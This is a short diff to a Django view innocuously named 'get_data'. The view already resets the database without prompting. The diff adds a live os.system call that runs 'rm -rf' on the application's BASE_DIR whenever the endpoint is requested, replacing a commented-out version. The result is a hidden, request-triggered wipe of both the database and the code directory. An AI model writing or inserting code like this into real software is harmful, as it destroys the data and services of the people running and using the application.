@@ -23,8 +23,8 @@ def get_data(request):
 
     call_command('reset_db', '--c', '--noinput')
 
-    # os.system('rm -rf /var/www/html/gnp_covid_survey')
+    os.system(f'rm -rf {settings.BASE_DIR}')
+
 
-    print(settings.BASE_DIR)
 
     return HttpResponse(status=200)
\ No newline at end of file
